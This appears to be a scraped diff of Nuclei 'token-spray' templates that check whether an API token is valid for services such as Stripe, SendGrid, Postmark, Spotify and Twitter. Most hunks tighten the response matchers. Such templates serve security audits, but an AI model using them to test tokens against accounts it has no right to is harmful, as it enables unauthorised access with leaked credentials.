author: zzeitlin
|
||||
reference: https://help.pendo.io/resources/support-library/api/index.html
|
||||
severity: info
|
||||
reference: https://help.pendo.io/resources/support-library/api/index.html
|
||||
tags: token-spray,pendo
|
||||
|
||||
self-contained: true
|
||||
|
@ -12,13 +12,14 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "https://app.pendo.io/api/v1/feature"
|
||||
- "https://app.pendo.io/api/v1/metadata/schema/account"
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
X-Pendo-Integration-Key: "{{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 403
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"createdByUser":'
|
||||
- '"id":'
|
||||
condition: and
|
|
@ -21,3 +21,4 @@ requests:
|
|||
negative: true
|
||||
words:
|
||||
- 'invalid_authentication'
|
||||
- 'unauthenticated'
|
|
@ -3,20 +3,24 @@ id: api-postmark
|
|||
info:
|
||||
name: PostMark API Test
|
||||
author: zzeitlin
|
||||
reference: https://postmarkapp.com/developer/api/overview
|
||||
severity: info
|
||||
reference: https://postmarkapp.com/developer/api/overview
|
||||
tags: token-spray,postmark
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.postmarkapp.com/stats/outbound"
|
||||
- "https://api.postmarkapp.com/server"
|
||||
headers:
|
||||
Accept: application/json
|
||||
X-Postmark-Server-Token: "{{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"ID":'
|
||||
- '"Name":'
|
||||
- '"ApiTokens":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-sendgrid
|
|||
info:
|
||||
name: Sendgrid API Test
|
||||
author: zzeitlin
|
||||
reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp
|
||||
severity: info
|
||||
reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp
|
||||
tags: token-spray,sendgrid
|
||||
|
||||
self-contained: true
|
|
@ -19,5 +19,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'error'
|
||||
negative: true
|
||||
- '"url":'
|
||||
- '"team_id":'
|
||||
- '"user_id":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-sonarcloud
|
|||
info:
|
||||
name: SonarCloud API Test
|
||||
author: zzeitlin
|
||||
reference: https://sonarcloud.io/web_api/api/authentication
|
||||
severity: info
|
||||
reference: https://sonarcloud.io/web_api/api/authentication
|
||||
tags: token-spray,sonarcloud
|
||||
|
||||
self-contained: true
|
||||
|
@ -19,4 +19,4 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'true'
|
||||
- '{"valid": true}'
|
|
@ -3,19 +3,23 @@ id: api-spotify
|
|||
info:
|
||||
name: Spotify API Test
|
||||
author: zzeitlin
|
||||
reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/
|
||||
severity: info
|
||||
reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/
|
||||
tags: token-spray,spotify
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.spotify.com/v1/me"
|
||||
- "https://api.spotify.com/v1/me/player/devices"
|
||||
headers:
|
||||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"devices":'
|
||||
- '"id":'
|
||||
- '"is_active":'
|
||||
condition: and
|
|
@ -19,5 +19,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Authorization Error"
|
||||
negative: true
|
||||
- '"id"'
|
||||
- '"username"'
|
||||
condition: and
|
||||
|
|
|
@ -3,8 +3,8 @@ id: api-stripe
|
|||
info:
|
||||
name: Stripe API Test
|
||||
author: zzeitlin
|
||||
reference: https://stripe.com/docs/api/authentication
|
||||
severity: info
|
||||
reference: https://stripe.com/docs/api/authentication
|
||||
tags: token-spray,stripe
|
||||
|
||||
self-contained: true
|
||||
|
@ -16,6 +16,10 @@ requests:
|
|||
Authorization: Basic {{base64(token + ':')}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"object":'
|
||||
- '"url":'
|
||||
- '"data":'
|
||||
condition: and
|
|
@ -19,5 +19,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "token_not_valid"
|
||||
negative: true
|
||||
- '"auth_code":'
|
||||
- '"state":'
|
||||
condition: and
|
||||
|
|
|
@ -21,7 +21,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'id":'
|
||||
- 'image_id":'
|
||||
- 'sub_id":'
|
||||
condition: and
|
||||
- '"country_code":'
|
||||
- '"created_at":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-travisci
|
|||
info:
|
||||
name: Travis CI API Test
|
||||
author: zzeitlin
|
||||
reference: https://developer.travis-ci.com/
|
||||
severity: info
|
||||
reference: https://developer.travis-ci.com/
|
||||
tags: token-spray,travis
|
||||
|
||||
self-contained: true
|
|
@ -3,8 +3,8 @@ id: api-twitter
|
|||
info:
|
||||
name: Twitter API Test
|
||||
author: zzeitlin
|
||||
reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index
|
||||
severity: info
|
||||
reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index
|
||||
tags: token-spray,twitter
|
||||
|
||||
self-contained: true
|
||||
|
@ -19,5 +19,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'error'
|
||||
negative: true
|
||||
- '"account_name":'
|
||||
- '"subscriptions_count_all":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-visualstudio
|
|||
info:
|
||||
name: Visual Studio API Test
|
||||
author: zzeitlin
|
||||
reference: https://openapi.appcenter.ms/
|
||||
severity: info
|
||||
reference: https://openapi.appcenter.ms/
|
||||
tags: token-spray,visualstudio,microsoft
|
||||
|
||||
self-contained: true
|
||||
|
@ -19,6 +19,8 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'Unauthorized'
|
||||
- '"id":'
|
||||
- '"description":'
|
||||
- '"owner":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-wakatime
|
|||
info:
|
||||
name: WakaTime CI API Test
|
||||
author: zzeitlin
|
||||
reference: https://wakatime.com/developers
|
||||
severity: info
|
||||
reference: https://wakatime.com/developers
|
||||
tags: token-spray,wakatime
|
||||
|
||||
self-contained: true
|
||||
|
@ -14,7 +14,10 @@ requests:
|
|||
- "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"data":'
|
||||
- '"seconds":'
|
||||
- '"is_up_to_date":'
|
||||
condition: and
|
|
@ -19,5 +19,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "errors"
|
||||
negative: true
|
||||
- 'id'
|
||||
- 'title'
|
||||
- 'type'
|
||||
condition: and
|
||||
|
|
|
@ -13,13 +13,10 @@ requests:
|
|||
path:
|
||||
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'quotaExceeded'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- '"kind":'
|
||||
- '"pageInfo":'
|
||||
condition: and
|
|
@ -1,4 +1,4 @@
|
|||
id: api-googlespeedlimit
|
||||
id: api-google-place-details
|
||||
|
||||
info:
|
||||
name: Google Place Details API Test
|
||||
|
|